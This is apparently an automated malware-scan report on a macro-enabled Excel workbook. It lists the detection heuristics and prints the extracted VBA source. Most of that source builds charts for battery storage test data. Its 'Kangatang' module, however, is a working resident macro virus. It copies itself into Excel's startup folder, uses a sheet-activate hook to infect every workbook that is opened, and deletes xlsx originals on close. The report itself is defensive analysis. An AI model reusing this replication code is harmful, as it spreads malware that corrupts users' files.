MALICIOUS
Risk Score: 284
Heuristics 8
- ClamAV: Xls.Malware.ExcelSic-10004731-1 (critical, CLAMAV_DETECTION)
  ClamAV detected this file as malware: Xls.Malware.ExcelSic-10004731-1
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings)
  Document contains a VBA project; VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ)
  CreateObject call
  Matched line in script: `Set d = CreateObject("Scripting.Dictionary")`
- VBA copies the workbook into the Excel XLSTART startup folder (high, OLE_VBA_XLSTART_PERSISTENCE)
  The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
  Matched line in script: `'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"`
- VBA infects other workbooks via an OnSheetActivate copy hook (high, OLE_VBA_WORKBOOK_INFECTION_SPREADER)
  The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
  Matched line in script: `Application.OnSheetActivate = ""`
- Auto_Open macro (low, OLE_VBA_AUTO)
  Auto_Open macro
  Matched line in script: `Sub Auto_Open()`
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE)
  Auto_Close macro
  Matched line in script: `Sub Auto_Close()`
- Hidden worksheet (veryHidden) (low, OOXML_HIDDEN_SHEET)
  Excel workbook contains 1 hidden sheet(s); hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14908 bytes |

SHA-256: f759662c3154b7180863e7218c6a288a4d64de42af1de16e3e93e7493a4dbfb3

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "St3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Storage_Aluminum"
Sub Report_Main()
Dim sht As Worksheet
Storage_Alu_Voltage_IMP_THK
Storage_Alu_CAP
For Each sht In Sheets
If sht.Name Like "DCR Data*" Then sht.Activate: Storage_Alu_DCR sht
Next sht
Storage_Alu_CU
End Sub
Sub Storage_Alu_Voltage_IMP_THK()
arrTitle = Array(, "电压(V)", "内阻(mΩ)", "厚度/mm", "重量/g", "厚度变化率(%)")
ChartCols = Array(, 1, 2, 3, 4, 7)
arrCategoryTitle = Array(, "Day", "Day", "Day", "Day", "Day")
arrValueTitle = Array(, "电压(V)", "内阻(mΩ)", "厚度/mm", "重量/g", "厚度变化率(%)")
CurvesSet "Voltage_IMP_THK Data", 2, 4, ChartCols, arrTitle, arrCategoryTitle, arrValueTitle, , , , 4, 4
End Sub
Sub Storage_Alu_Voltage()
arrTitle = Array(, "入柜前电压趋势图")
ChartCols = Array(, 2)
arrCategoryTitle = Array(, "Day")
arrValueTitle = Array(, "电压(V)")
CurvesSet "入柜前Voltage", 1, 1, ChartCols, arrTitle, arrCategoryTitle, arrValueTitle, , , , 4, 1
End Sub
Sub Storage_Alu_DCR(sht As Worksheet)
arrTitle = Array(, "CC_DCR增长图", "DC_DCR增长图", "正极接触内阻 曲线", "负极接触内阻 曲线")
ChartCols = Array(, 1, 9, 17, 18)
arrCategoryTitle = Array(, "Day", "Day", "Day", "Day")
arrValueTitle = Array(, "CC_DCR/mΩ", "DC_DCR/mΩ", "正极接触内阻", "负极接触内阻")
arrTitle1 = Array(, "正极接触内阻 曲线", "负极接触内阻 曲线", "CC_DCR增长图", "DC_DCR增长图")
ChartCols1 = Array(, 17, 18, 1, 9)
arrValueTitle1 = Array(, "正极接触内阻", "负极接触内阻", "CC_DCR/mΩ", "DC_DCR/mΩ")
CurvesSet sht.Name, 2, 2, ChartCols, arrTitle, arrCategoryTitle, arrValueTitle, , , , 11, 2
CurvesSet sht.Name, 2, 4, ChartCols1, arrTitle1, arrCategoryTitle, arrValueTitle1, , False, , 11, 2, 750, , False
End Sub
Sub Storage_Alu_CU()
arrTitle = Array(, "CU拟合值 曲线图")
ChartCols = Array(, 1)
arrCategoryTitle = Array(, "Day")
arrValueTitle = Array(, "CU拟合值")
CurvesSet "CU", 2, 1, ChartCols, arrTitle, arrCategoryTitle, arrValueTitle, , , , 4, 2
CurvesSet "CU", 2, 1, ChartCols, arrTitle, arrCategoryTitle, arrValueTitle, , False, , 4, 2, 400, , False
End Sub
Sub Storage_Alu_CAP()
arrTitle = Array(, "残余容量 曲线", "恢复容量 曲线", "正极接触内阻 曲线", "负极接触内阻 曲线")
ChartCols = Array(, 1, 2, 5, 6)
arrCategoryTitle = Array(, "Day", "Day", "Day", "Day")
arrValueTitle = Array(, "残余容量", "恢复容量", "正极接触内阻", "负极接触内阻")
arrTitle1 = Array(, "正极接触内阻 曲线", "负极接触内阻 曲线", "残余容量 曲线", "恢复容量 曲线")
ChartCols1 = Array(, 5, 6, 1, 2)
arrValueTitle1 = Array(, "正极接触内阻", "负极接触内阻", "残余容量", "恢复容量")
CurvesSet "Process CAP Data", 3, 2, ChartCols, arrTitle, arrCategoryTitle, arrValueTitle, , , , 11, 3
CurvesSet "Process CAP Data", 3, 4, ChartCols1, arrTitle1, arrCategoryTitle, arrValueTitle1, , False, , 11, 3, 750, , False
End Sub
Sub DelChar(sht As Worksheet)
On Error Resume Next
For Each shp In sht.Shapes
' If shp.Name <> "Picture 1" Then shp.Delete
shp.Delete
Next shp
On Error GoTo 0
End Sub
Function FindSheet(sht As String) As Boolean
For Each sh In Worksheets
If sh.Name = sht Then FindSheet = True: Exit Function Else FindSheet = False
Next sh
End Function
Function Groups(Grp As String, Optional isGrp = True, Optional dic)
Dim sht As Worksheet, c As Object
Set d = CreateObject("Scripting.Dictionary")
Set sht = Sheets("Summary")
' Set c = sht.Cells.Find(Grp, , xlValues, xlWhole)
Set c = sht.Cells.Find(What:=Grp, LookIn:=xlValues, LookAt:= _
xlWhole, SearchOrder:=xlByRows, SearchDirection:=xlNext, MatchCase:=False _
, MatchByte:=False, SearchFormat:=False)
i = 0
Do
i = i + 1
t = c.Offset(i, 0)
If t = "" Then Exit Do
t1 = c.Offset(i, -1)
If isGrp = False Then
d(t1) = t1
Else
If Not d.Exists(t) Then d(t) = t1 Else d(t) = d(t) & "|" & t1
End If
Loop
Set dic = d
End Function
Sub CurvesSet(xname As String, xcol As Integer, ChtCnts As Integer, ChartCols, arrTitle, arrCategoryTitle, arrValueTitle, _
Optional MajorUnt = 0, Optional isGroup As Boolean = True, Optional AxesPrimaryNumFromat = "0.00", _
Optional startRow = 4, Optional startCol = 1, Optional LfPoint = 30, Optional tubiaoweizhi = 0, Optional isDelChart = True)
Dim sht As Worksheet
Dim ChartObj As ChartObject, newChart As Chart
Dim col As Long, rw As Long
Dim c As Object, tm 'd As New Scripting.Dictionary
Dim actWb As Workbook
On Error Resume Next
Set actWb = ThisWorkbook
Set sht = actWb.Sheets(xname)
Call Groups("组别", isGroup, d)
sht.Activate
If ActiveSheet.ChartObjects.Count > 0 And isDelChart = True Then ActiveSheet.ChartObjects.Delete
If tubiaoweizhi = 0 Then tubiaoweizhi = sht.Cells(sht.Cells(10000, 1).End(xlUp).Row + 5, 1).top
rw = sht.Cells(10000, xcol).End(xlUp).Row
For i = 1 To IIf(isGroup = True, d.Count, 1) 'number of groups
tms = d.Items
kys = d.Keys
tm = Split(tms(i - 1), "|")
' Debug.Print tm(i - 1), d.Keys(i - 1)
For ChtCnt = 1 To ChtCnts 'number of charts per group
If isGroup = False And ChtCnts = 1 Then
Set ChartObj = sht.ChartObjects.Add(LfPoint, tubiaoweizhi, 350, 220)
ElseIf ChtCnts = 1 And isGroup = True Then
Set ChartObj = sht.ChartObjects.Add(LfPoint, tubiaoweizhi + (i - 1) * 230, 350, 220)
ElseIf isGroup = False Then
Set ChartObj = sht.ChartObjects.Add(LfPoint + (ChtCnt - 1) * 360, tubiaoweizhi, 350, 220)
Else
Set ChartObj = sht.ChartObjects.Add(LfPoint + (ChtCnt - 1) * 360, tubiaoweizhi + (i - 1) * 230, 350, 220) 'chart position, chart size
End If
Set newChart = ChartObj.Chart
With newChart
.ChartWizard Source:=sht.Range("P1:Q1"), gallery:=xlLineMarkers, PlotBy:=xlColumns, HasLegend:=True, _
Title:=IIf(isGroup = False, "", kys(i - 1) & "-") & arrTitle(ChtCnt), _
CategoryTitle:=arrCategoryTitle(ChtCnt), _
ValueTitle:=arrValueTitle(ChtCnt)
.Axes(xlValue).TickLabels.NumberFormatLocal = AxesPrimaryNumFromat
For Each oSeries In .SeriesCollection 'initialise the chart area
oSeries.Delete
Next
For j = 1 To (UBound(tm) + 1) * IIf(isGroup = False, d.Count, 1) 'number of curves
txt = kys(j - 1)
If isGroup = True Then Set c = Rows("1:8").Find(tm(j - 1), , xlValues) Else Set c = Rows("1:8").Find(txt, , xlValues)
If Not c Is Nothing Then col = c.Column Else c = startCol
If col = 0 Then Exit For
' rw = Cells(100000, col).End(xlUp).Row
If isGroup = False Then strTitle = txt Else strTitle = kys(i - 1) & "-" & tm(j - 1)
col = col + ChartCols(ChtCnt) - 1
.SeriesCollection.NewSeries
.FullSeriesCollection(j).Name = strTitle
.FullSeriesCollection(j).XValues = "='" & xname & "'!" & sht.Range(sht.Cells(startRow, xcol), sht.Cells(rw, xcol)).Address
.FullSeriesCollection(j).Values = "='" & xname & "'!" & sht.Range(sht.Cells(startRow, col), sht.Cells(rw, col)).Address
.FullSeriesCollection(j).ChartType = xlLineMarkers
.FullSeriesCollection(j).MarkerSize = 5
.FullSeriesCollection(j).MarkerStyle = xlMarkerStyleCircle
' .Axes(xlCategory).AxisTitle.Delete
col = 0
Next j
SetCategory newChart, 60, sht.Cells(4, 2), sht.Cells(rw + 1, 2), MajorUnt
End With
Next ChtCnt
Next i
On Error GoTo 0
End Sub
Sub setFormatConditions(rng As Range)
Cells.FormatConditions.Delete
With rng
Range("H11:I12").Select
.FormatConditions.Add Type:=xlExpression, Formula1:= _
"=if(or(" & rng.Cells(1, 1).Address(0, 1) & "-" & rng.Cells(1, 2).Address(0, 1) & ">0.1," & rng.Cells(1, 1).Address(0, 1) & "-" & rng.Cells(1, 2).Address(0, 1) & "<-0.1),true,false)"
.FormatConditions(Selection.FormatConditions.Count).SetFirstPriority
With .FormatConditions(1).Interior
.PatternColorIndex = xlAutomatic
.Color = 255
.TintAndShade = 0
End With
.FormatConditions(1).StopIfTrue = False
End With
End Sub
Function SetCategory(cht As Chart, Optional ticklabel As Integer = 0, Optional min = 0, Optional max = 0, Optional MajorUnt = 0, Optional NumberFormat = 0, Optional CategoryType = xlAutomatic)
With cht.Axes(xlCategory)
.TickLabels.Orientation = ticklabel
If min <> 0 Then .MinimumScale = Val(min)
If max <> 0 Then .MaximumScale = max
If MajorUnt <> 0 Then .MajorUnit = MajorUnt
If CategoryType <> 0 Then .CategoryType = CategoryType
If NumberFormat <> 0 Then .TickLabels.NumberFormatLocal = NumberFormat
End With
End Function
Function SetLegend(cht As Chart, left, top, width, height, Optional SetElmnt = msoElementLegendRight)
With cht
.SetElement (SetElmnt)
.Legend.left = left
.Legend.top = top
.Legend.width = width
.Legend.height = height
End With
End Function
Function SetPlotArea(cht As Chart, left, top, width, height)
With cht
.PlotArea.left = left
.PlotArea.top = top
.PlotArea.width = width
.PlotArea.height = height
End With
End Function
Attribute VB_Name = "Kangatang"
Sub Auto_Open()
'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
Application.ScreenUpdating = False
Windows(1).Visible = False
ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
Windows(1).Visible = True
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub
Sub Auto_Close()
On Error Resume Next
Application.DisplayAlerts = False
If Right(ThisWorkbook.Name, 4) <> "xlsx" Or Application.Version <= 11 Then Exit Sub
ThisWorkbook.SaveAs Filename:=ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xlsx", ".xls"), _
FileFormat:=xlExcel8, Password:="", WriteResPassword:="", _
ReadOnlyRecommended:=False, CreateBackup:=False
Kill ThisWorkbook.Path & "\" & Replace(ThisWorkbook.Name, ".xls", ".xlsx")
End Sub
Sub allocated()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
Application.ScreenUpdating = False
currentsh = ActiveSheet.Name
ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
ActiveWorkbook.Sheets(currentsh).Select
Application.ScreenUpdating = True
End If
End Sub
Attribute VB_Name = "Sheet8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 69632 bytes |

SHA-256: cfdec97cafa3ec693ba6435d7e174fb6b2d6e7af8ba026ffcfb9626ef4139ca2

Detection
ClamAV: Xls.Malware.ExcelSic-10004731-1
Obfuscation or payload: unlikely